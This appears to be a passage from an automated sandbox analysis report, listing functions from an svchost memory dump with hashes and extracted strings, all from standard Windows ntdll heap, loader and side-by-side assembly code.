                                • Opcode ID: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                • Instruction ID: 7aeef9516231f1dd5a75fb4b70d58783c071b4a3d51c8eb3b11ffe59b4fa0bda
                                • Opcode Fuzzy Hash: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                • Instruction Fuzzy Hash: 8DD104B2814391AFD721DB64C844BAFF7F8AF84714F094A2DFA84DB250D770CA449B92
                                Function 03CE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 0-1700792311
                                • Opcode ID: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                • Instruction ID: 999f04eca14c49a2ca8f355fc30e75c9ec0dcfe12cbacca1a292ff7799485455
                                • Opcode Fuzzy Hash: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                • Instruction Fuzzy Hash: A9D1EB365006A0DFCB22EF6AC440AADFBF1FF4A700F098059E855DF252C7B4AA41DB94
                                Function 03C2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 03C2D196
                                • @, xrefs: 03C2D313
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03C2D2C3
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03C2D0CF
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03C2D146
                                • @, xrefs: 03C2D2AF
                                • @, xrefs: 03C2D0FD
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03C2D262
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-1356375266
                                • Opcode ID: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                • Instruction ID: af4fcbf12c9de4b1e460a68bd190f137aa02439ed57a2f21bc7c4e55b5142e14
                                • Opcode Fuzzy Hash: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                • Instruction Fuzzy Hash: FDA19B759083559FD320DF25C488B6BBBE8BB84729F014D2EE999DA240D774DA08CF93
                                Function 03C3ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                • API String ID: 0-664215390
                                • Opcode ID: 609b6179558d2b36bdaf2e4148e8a5a805fee5a9b0b587ea1ef9254c8254a378
                                • Instruction ID: 094cb5c574beef4f3a305ff16bf7ca5abd68ed244ffe17e2058769545b11d1b8
                                • Opcode Fuzzy Hash: 609b6179558d2b36bdaf2e4148e8a5a805fee5a9b0b587ea1ef9254c8254a378
                                • Instruction Fuzzy Hash: EC3281759042A98BEF21CB15CC98BEEB7B9AF46340F1541EAE849EB250D7719F818F40
                                Function 03C49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                Download Yara Rule
                                Strings
                                • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03C97709
                                • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03C976EE
                                • Internal error check failed, xrefs: 03C97718, 03C978A9
                                • sxsisol_SearchActCtxForDllName, xrefs: 03C976DD
                                • @, xrefs: 03C49EE7
                                • minkernel\ntdll\sxsisol.cpp, xrefs: 03C97713, 03C978A4
                                • Status != STATUS_NOT_FOUND, xrefs: 03C9789A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                • API String ID: 0-761764676
                                • Opcode ID: 236b67388ede598e36d5e00720f3e6cdc601777bae60ffd2bd422c5ac824b44d
                                • Instruction ID: 823743992231dbd21af98f464be9fd376f43b41db0ce1a37e42650ee53cc8960
                                • Opcode Fuzzy Hash: 236b67388ede598e36d5e00720f3e6cdc601777bae60ffd2bd422c5ac824b44d
                                • Instruction Fuzzy Hash: B3128F75910225DFEF24CF98C885ABEB7B4FF48710F1980AAE849EF241E7349951CB64
                                Function 03C3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                • API String ID: 0-1109411897
                                • Opcode ID: 5668b9cd5a9855ae0e7f1aa326e5913060e24b0953e713bc0d29ff0501a1823f
                                • Instruction ID: 009d70cc86bfa44d507a5995e7177088723fde75edcb6e6d8237ee9bcbe0c550
                                • Opcode Fuzzy Hash: 5668b9cd5a9855ae0e7f1aa326e5913060e24b0953e713bc0d29ff0501a1823f
                                • Instruction Fuzzy Hash: 5CA22875E05629CBDF68DF2ACC887A9B7B5AF45304F1542EAD809EB250DB359E81CF00
                                Function 03C2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                • Instruction ID: 5601b05e4e032a7c7b429a112b8deb5f94814d330cf8135b89f3dd2bb7448a73
                                • Opcode Fuzzy Hash: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                • Instruction Fuzzy Hash: 8742ED752083959FC715EF29C884A2AFBF5FF85608F08496DE486CB392D730EA41CB52
                                Function 03C4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                • Instruction ID: 28b675d987838117330043e859db52ecf93edab2ec4362c1d63bf91e131efdcf
                                • Opcode Fuzzy Hash: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                • Instruction Fuzzy Hash: 88C14A31A00315ABDF24DF69C894BBEF7A5AF46300F194069E886DF291EBB4DD44D3A1
                                Function 03C663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-792281065
                                • Opcode ID: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                • Instruction ID: 401a976d6696826e40c6c12aaabc568797d04490f6c7b7937c1e4415a19dc6ef
                                • Opcode Fuzzy Hash: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                • Instruction Fuzzy Hash: 3B916A35A00B159BDB38EF2AD884BBEB7A1FB51728F050128E911EF781D7B49911D790
                                Function 03C6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 03C6C6C3
                                • LdrpInitializeImportRedirection, xrefs: 03CA8177, 03CA81EB
                                • minkernel\ntdll\ldrredirect.c, xrefs: 03CA8181, 03CA81F5
                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 03CA81E5
                                • LdrpInitializeProcess, xrefs: 03C6C6C4
                                • Loading import redirection DLL: '%wZ', xrefs: 03CA8170
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-475462383
                                • Opcode ID: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                • Instruction ID: 27c9893bb2149173afc46c104941952e22cdb6c17c1ec651e4f26d593d9eebeb
                                • Opcode Fuzzy Hash: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                • Instruction Fuzzy Hash: 5D310476744741AFC224EF28D946E2AB7E4EF94B14F050968F881EF291D620ED04D7A2
                                Function 03C62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03CA219F
                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03CA2180
                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03CA2178
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03CA21BF
                                • RtlGetAssemblyStorageRoot, xrefs: 03CA2160, 03CA219A, 03CA21BA
                                • SXS: %s() passed the empty activation context, xrefs: 03CA2165
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                • API String ID: 0-861424205
                                • Opcode ID: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                • Instruction ID: 6916c881a41f950019498c1d2f77126f589f02c97e221302d42998ffb5c3d423
                                • Opcode Fuzzy Hash: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                • Instruction Fuzzy Hash: 45310336F40225BBE721CA99CC81F9EB678DB95A44F094469FB04FB241D671EE00E7A1
                                Function 03CB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                • API String ID: 0-3127649145
                                • Opcode ID: 48f0f7570b0a2d675e4aa783f8957edad6634bb30ea70b3b3152bbdb2374d481
                                • Instruction ID: d04c803764ca9c4e19fd584aa7adc3d075106e168be8da59459c491f1b4b360c
                                • Opcode Fuzzy Hash: 48f0f7570b0a2d675e4aa783f8957edad6634bb30ea70b3b3152bbdb2374d481
                                • Instruction Fuzzy Hash: 10323479A017199BDB61DF25CC88BDAB7F8FF48300F1041AAE549EB250DB71AA84CF50
                                Function 03C49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                • API String ID: 0-3393094623
                                • Opcode ID: daffcc6d8008f06c9992b37dbbd4742425974b97aef22cd9124325e6d6057de9
                                • Instruction ID: b99420e510eed0d296bd3e94ff0059653329631643a302545806f0db522b9825
                                • Opcode Fuzzy Hash: daffcc6d8008f06c9992b37dbbd4742425974b97aef22cd9124325e6d6057de9
                                • Instruction Fuzzy Hash: 120257719093618FD720CF65C084BABFBE4BF89714F49896EE889CB250E770D944CB92
                                Function 03C551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                Download Yara Rule
                                Strings
                                • Kernel-MUI-Number-Allowed, xrefs: 03C55247
                                • Kernel-MUI-Language-Allowed, xrefs: 03C5527B
                                • Kernel-MUI-Language-Disallowed, xrefs: 03C55352
                                • WindowsExcludedProcs, xrefs: 03C5522A
                                • Kernel-MUI-Language-SKU, xrefs: 03C5542B
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-258546922
                                • Opcode ID: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                • Instruction ID: 80d60eb807c4320fec72bba974ecd46de9b097f89655a218400b89b5f48f5f08
                                • Opcode Fuzzy Hash: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                • Instruction Fuzzy Hash: 84F16C76D10218EFCF11DF99C980AEEBBB9FF49650F16406AE902EB250D7709E40DB94
                                Function 03CB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                • API String ID: 0-2518169356
                                • Opcode ID: 79eb54cde1f430ea1c6f88a9ff4b3f8a5686d8bccd93161293fb002f78a7517e
                                • Instruction ID: cf5ee2fa00da5129fba6b056df96c66990dcde411a878010f2ec42be4a2efa03
                                • Opcode Fuzzy Hash: 79eb54cde1f430ea1c6f88a9ff4b3f8a5686d8bccd93161293fb002f78a7517e
                                • Instruction Fuzzy Hash: 0B91BE76D006199BCB25CFA9C881AFEB7B5FF4A310F594169E811EB350D735DA01CB90
                                Function 03C5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1975516107
                                • Opcode ID: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                • Instruction ID: 4d37704eabfd067065bbddff75f749ae4b4470e54d57ed5fcde24c9d5df644a4
                                • Opcode Fuzzy Hash: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                • Instruction Fuzzy Hash: 57510F36A00345DFDB24EFA4D48879DBBB1BF59304F294059E802EF291C770AA80CBC4
                                Function 03C276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                • Instruction ID: e9a8cb2dd3a9e927e0358f40e721af50ff32aff61212d1e208949f8525ffdb9f
                                • Opcode Fuzzy Hash: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                • Instruction Fuzzy Hash: 810128761097A0DED22AF31AA409F56BBE4DB42B74F194059E010CF692CAA4AD80D560
                                Function 03C470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                • Instruction ID: 1f03a5d7873bcf6f2235eef059de66839e415d2f67846c08c87144ed7772d47f
                                • Opcode Fuzzy Hash: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                • Instruction Fuzzy Hash: BA139970A00759CFDB29CF69C8907A9FBB1BF49304F1881A9D859EF381D735AA45CB90
                                Function 03C41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-3570731704
                                • Opcode ID: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                • Instruction ID: a1d0ae9520d3b11266be84396c5945290bf75d2e0d7382c5b70b859d1afc349c
                                • Opcode Fuzzy Hash: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                • Instruction Fuzzy Hash: 0E923875A01268CFEB25CF19C844BA9B7B5BF45314F0A81EAD989EB390D7349E80CF51
                                Function 03C4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                Download Yara Rule
                                Strings
                                • SsHd, xrefs: 03C4A885
                                • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03C97D03
                                • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03C97D39
                                • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03C97D56
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                • API String ID: 0-2905229100
                                • Opcode ID: 9a7e9fcf7fb7303b6e46e36fa7cf8e69821fa18bacf7b222178f6ca3e774e802
                                • Instruction ID: d2c9679ee00077479c22a5f2232fa5315c0cb8dca1835d304655d97dcd1ee2f4
                                • Opcode Fuzzy Hash: 9a7e9fcf7fb7303b6e46e36fa7cf8e69821fa18bacf7b222178f6ca3e774e802
                                • Instruction Fuzzy Hash: 25D17C7AA402199BDF24CF99C880AADF7B5FF58310F19406AE845EF351D371EA91CB90
                                Function 03C43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: ce9f1960e1f15b6e969be619911d77087d0caf06cb385cde991d04580c41212f
                                • Instruction ID: bc7919b31890d06e8981a1aad1546820ac19039130045e8dfa8f5aa80b9f4ea9
                                • Opcode Fuzzy Hash: ce9f1960e1f15b6e969be619911d77087d0caf06cb385cde991d04580c41212f
                                • Instruction Fuzzy Hash: ADE2A074A006558FDB28CF6AC890BA9FBF1FF49304F288199D849EF385D735A945CB90
                                Function 03C3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                • API String ID: 0-379654539
                                • Opcode ID: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                • Instruction ID: 8a01517463ba27e19304a8470170bb1423d67f8b7f67b32422c087714acd8aad
                                • Opcode Fuzzy Hash: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                • Instruction Fuzzy Hash: A5C187791083869FDB11DF19C044B6AB7F4BF8A704F04886AF8D6CB250E735CA59CB92
                                Function 03C40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                Download Yara Rule
                                Strings
                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03C955AE
                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03C954ED
                                • HEAP[%wZ]: , xrefs: 03C954D1, 03C95592
                                • HEAP: , xrefs: 03C954E0, 03C955A1
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                • API String ID: 0-1657114761
                                • Opcode ID: 9f97ba4c01ddaee27a232c49c474d802d278c49840c44b229a6f1000e64a8be0
                                • Instruction ID: 076e8c470aff0b65029a658a9df4aa2a925a25cbc75631ca56e5e76a89266ff1
                                • Opcode Fuzzy Hash: 9f97ba4c01ddaee27a232c49c474d802d278c49840c44b229a6f1000e64a8be0
                                • Instruction Fuzzy Hash: 82A1FE74644265DFDB24DF29C840BBAFBB1BF45300F188569D59ACB282D330A948DB91
                                Function 03C6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03CA22B6
                                • .Local, xrefs: 03C628D8
                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03CA21D9, 03CA22B1
                                • SXS: %s() passed the empty activation context, xrefs: 03CA21DE
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                • API String ID: 0-1239276146
                                • Opcode ID: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                • Instruction ID: b2826c32c868836ce46a7b669e1b236e9d08e5134f462f307af6c926902610be
                                • Opcode Fuzzy Hash: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                • Instruction Fuzzy Hash: CDA1903590022A9FDB24CF65CC84BA9B3B5BF58314F1949E9D948EB251D730AE81CF90
                                Function 03CE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                • API String ID: 0-336120773
